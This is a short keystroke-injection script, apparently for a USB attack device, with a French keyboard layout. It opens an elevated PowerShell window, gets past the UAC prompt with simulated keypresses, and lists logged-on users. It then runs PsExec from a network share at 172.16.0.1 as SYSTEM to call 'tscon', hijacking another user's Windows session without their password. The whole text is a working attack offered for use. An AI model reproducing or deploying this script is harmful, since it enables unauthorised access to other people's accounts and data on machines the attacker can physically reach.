layout('fr')
typingSpeed(0,0)
press("GUI r")
delay(200)
type("powershell")
press("CTRL SHIFT ENTER")
delay(1000)
press("SHIFT TAB")
press("ENTER")
delay(3000)
type('$ID = (Get-Process -PID $pid).SessionID\n')
type('clear\n')
type('query user\n')
type('$User = Read-Host -Prompt \'ID de session ?(Vous avez 15 secondes pour choisir)\'\n')
delay(15000)
type('\\\\172.16.0.1\\Data\\PsExec.exe -s \\\\localhost -i $ID tscon $User\n')